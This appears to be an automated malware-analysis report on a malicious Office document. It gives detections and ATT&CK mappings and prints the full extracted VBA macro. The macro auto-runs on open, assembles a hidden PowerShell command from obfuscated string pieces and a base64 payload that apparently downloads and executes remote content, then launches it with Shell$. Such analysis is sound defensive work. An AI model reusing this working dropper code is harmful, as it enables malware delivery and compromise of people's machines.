MALICIOUS
170
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes a Shell() call, indicating an attempt to execute external commands. The ClamAV detection name 'Doc.Dropper.Agent-6460481-0' further supports its nature as a dropper. The macro's obfuscated string concatenation suggests it is preparing to download and execute a secondary payload.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6460481-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6460481-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBAMatched line in script
IN_PA = IN_PA + JP_NF Shell$ IN_PA End Sub -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "cherrycoke" Sub AutoOpen() Dim IN_PA As String -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6164 bytes |
SHA-256: e2619aedabeaa521ad516c8d0dfa1bf4fb311876037e9a442bb04ff61695c9d9 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "cherrycoke"
Sub AutoOpen()
Dim IN_PA As String
JT_QH = Array(" ", "e", "o", "t", "s", "a", "r", "x", "l", "p", "n", "-", "u", "c", "b", "h", "y", "d", "i", "w")
Dim DS_QF As String
DS_QF = "ZgB1AG4AYwB0"
IN_PA = IN_PA + JT_QH(9)
IN_PA = IN_PA + JT_QH(2)
Dim IT_LI As String
IT_LI = "AGkAbwBuACAAYQAoACQ"
IN_PA = IN_PA + JT_QH(19)
IN_PA = IN_PA + JT_QH(1)
Dim FS_TJ As String
FS_TJ = "AeAApAHsAcgBlAHQAdQByAG4A"
IN_PA = IN_PA + JT_QH(6)
IN_PA = IN_PA + JT_QH(4)
Dim AN_QJ As String
AN_QJ = "IABbAFMAeQBzAHQAZQBt"
IN_PA = IN_PA + JT_QH(15)
IN_PA = IN_PA + JT_QH(1)
Dim GM_LI As String
GM_LI = "AC4AVABlAHgAdAAuAEUAbgBjAG8AZABpA"
JP_NF = JP_NF & DS_QF & IT_LI & FS_TJ & AN_QJ & GM_LI
IN_PA = IN_PA + JT_QH(8)
IN_PA = IN_PA + JT_QH(8)
Dim HT_MD As String
HT_MD = "G4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuA"
IN_PA = IN_PA + JT_QH(0)
IN_PA = IN_PA + JT_QH(11)
Dim CN_LF As String
CN_LF = "GcAKABbAFMAeQBzAHQAZQ"
IN_PA = IN_PA + JT_QH(19)
IN_PA = IN_PA + JT_QH(18)
Dim BR_MI As String
BR_MI = "BtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwB"
IN_PA = IN_PA + JT_QH(10)
IN_PA = IN_PA + JT_QH(17)
Dim AQ_NB As String
AQ_NB = "tAEIAYQBzAGUANgA0AFMAdAByAGkAbg"
IN_PA = IN_PA + JT_QH(2)
IN_PA = IN_PA + JT_QH(19)
Dim GK_NE As String
GK_NE = "BnACgAJAB4ACkAKQB9ADsAaQ"
JP_NF = JP_NF & HT_MD & CN_LF & BR_MI & AQ_NB & GK_NE
IN_PA = IN_PA + JT_QH(4)
IN_PA = IN_PA + JT_QH(3)
Dim BM_OD As String
BM_OD = "BlAHgAIAAkACgAYQAgACQAKAAkACgAJA"
IN_PA = IN_PA + JT_QH(16)
IN_PA = IN_PA + JT_QH(8)
Dim GO_SI As String
GO_SI = "AoAGkAbgB2AG8AawBlAC0AdwBlAGIAc"
IN_PA = IN_PA + JT_QH(1)
IN_PA = IN_PA + JT_QH(0)
Dim AQ_KJ As String
AQ_KJ = "gBlAHEAdQBlAHMAdAAgACcAaAB0AHQAcABzADoALwAvAHUA"
IN_PA = IN_PA + JT_QH(15)
IN_PA = IN_PA + JT_QH(18)
Dim AS_TJ As String
AS_TJ = "cwBwAHIAZAA1ADEANQ"
IN_PA = IN_PA + JT_QH(17)
IN_PA = IN_PA + JT_QH(17)
Dim DT_LF As String
DT_LF = "AwAGMAZQBuA"
JP_NF = JP_NF & BM_OD & GO_SI & AQ_KJ & AS_TJ & DT_LF
IN_PA = IN_PA + JT_QH(1)
IN_PA = IN_PA + JT_QH(10)
Dim IO_SH As String
IO_SH = "HQAcgBhAGwALgB0AGEAYgBsAGUALgBjAG8AcgBlAC4Adw"
IN_PA = IN_PA + JT_QH(0)
IN_PA = IN_PA + JT_QH(11)
Dim HN_SI As String
HN_SI = "BpAG4AZ"
IN_PA = IN_PA + JT_QH(1)
IN_PA = IN_PA + JT_QH(7)
Dim IM_NI As String
IM_NI = "ABvAHcAcwAuAG4AZQB0AC8AdwBhAHI"
IN_PA = IN_PA + JT_QH(1)
IN_PA = IN_PA + JT_QH(13)
Dim HS_KF As String
HS_KF = "AZQBoAG8AdQBzAGUAPwAkAGYAaQBsAHQAZQByAD0AUABhAH"
IN_PA = IN_PA + JT_QH(12)
IN_PA = IN_PA + JT_QH(3)
Dim HR_KI As String
HR_KI = "IAdABpAHQAaQBvAG4ASwBlAHkAJQAyADAAZ"
JP_NF = JP_NF & IO_SH & HN_SI & IM_NI & HS_KF & HR_KI
IN_PA = IN_PA + JT_QH(18)
IN_PA = IN_PA + JT_QH(2)
Dim FR_LD As String
FR_LD = "QBxACUAMgAwACUAMgA3AHMA"
IN_PA = IN_PA + JT_QH(10)
IN_PA = IN_PA + JT_QH(9)
Dim DR_NI As String
DR_NI = "dABhAGcAZQAlADIANwAmACQAUwBlAGwAZQ"
IN_PA = IN_PA + JT_QH(2)
IN_PA = IN_PA + JT_QH(8)
Dim CL_LG As String
CL_LG = "BjAHQAPQBkAGEAdABhACYAc"
IN_PA = IN_PA + JT_QH(18)
IN_PA = IN_PA + JT_QH(13)
Dim EP_LH As String
EP_LH = "wB2AD0AMgAwADEAN"
IN_PA = IN_PA + JT_QH(16)
IN_PA = IN_PA + JT_QH(0)
Dim FT_NF As String
FT_NF = "wAtADAANAAtADEANwAmAHMAcwA9AGIAZgBxA"
JP_NF = JP_NF & FR_LD & DR_NI & CL_LG & EP_LH & FT_NF
IN_PA = IN_PA + JT_QH(14)
IN_PA = IN_PA + JT_QH(16)
Dim DT_MC As String
DT_MC = "HQAJgBz"
IN_PA = IN_PA + JT_QH(9)
IN_PA = IN_PA + JT_QH(5)
Dim HR_MB As String
HR_MB = "AHIAdAA9AHMAYwBvACYAcwBwAD0AcgB3AGQAbABhA"
IN_PA = IN_PA + JT_QH(4)
IN_PA = IN_PA + JT_QH(4)
Dim ET_NJ As String
ET_NJ = "GMAdQBwACYAcwBlAD0AMgAwADEANwAtADEAMA"
IN_PA = IN_PA + JT_QH(0)
IN_PA = IN_PA + JT_QH(11)
Dim EL_OA As String
EL_OA = "AtADAANgBUADIAMgA6ADQAMQA6ADEAMgBaACYAcwB"
IN_PA = IN_PA + JT_QH(1)
IN_PA = IN_PA + JT_QH(0)
Dim JS_SD As String
JS_SD = "0AD0AMgAwADEANwAtADAAOQAtADIAOABUADEANAA6ADQAMQA6A"
JP_NF = JP_NF & DT_MC & HR_MB & ET_NJ & EL_OA & JS_SD
Dim FL_PE As String
FL_PE = "DEAMgBaACYA"
Dim EK_OC As String
EK_OC = "cwBwAHIAPQBoAHQAd"
Dim FS_KJ As String
FS_KJ = "ABwAHMAJgBzAGkAZwA9AHQA"
Dim EP_NH As String
EP_NH = "egBQADcAYwA4AHgAWgBoAH"
Dim FO_ND As String
FO_ND = "IAMQBzAGIAdgB4ADkAZgBKAFMAdwBKAEkAU"
JP_NF = JP_NF & FL_PE & EK_OC & FS_KJ & EP_NH & FO_ND
Dim FN_LG As String
FN_LG = "wBIAEIANgBlADgAJQAyAEI"
Dim DQ_TG As String
DQ_TG = "AbgBsAGwAdQBuAEgAaQBmAEwAMwBoAH"
Dim AM_LI As String
AM_LI = "gAagA0ACUAMwB"
Dim HO_LC As String
HO_LC = "EACcAIAAtAEgAZQB"
Dim GP_TI As String
GP_TI = "hAGQAZQByAHMAIABAAHsAJwB"
JP_NF = JP_NF & FN_LG & DQ_TG & AM_LI & HO_LC & GP_TI
Dim FS_TA As String
FS_TA = "BAGMAYwBlAHAAdAAn"
Dim JP_ND As String
JP_ND = "AD0AJwBBAHA"
Dim DQ_RJ As String
DQ_RJ = "AcABsAGkAYwBh"
Dim FL_SJ As String
FL_SJ = "AHQAaQBvAG4ALwBKAFMATwBOAC"
Dim BP_KE As String
BP_KE = "cAfQApAC4AQwBvAG4AdABlAG4AdAAgAHw"
JP_NF = JP_NF & FS_TA & JP_ND & DQ_RJ & FL_SJ & BP_KE
Dim FT_LG As String
FT_LG = "AIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBK"
JP_NF = JP_NF & FT_LG
Dim CN_MF As String
CN_MF = "AHMAbwBuACkALgB2AGEAbAB1AGUALgBkAGEAdABhAC"
JP_NF = JP_NF & CN_MF
Dim HR_RB As String
HR_RB = "kAKQA="
JP_NF = JP_NF & HR_RB
IN_PA = IN_PA + JP_NF
Shell$ IN_PA
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.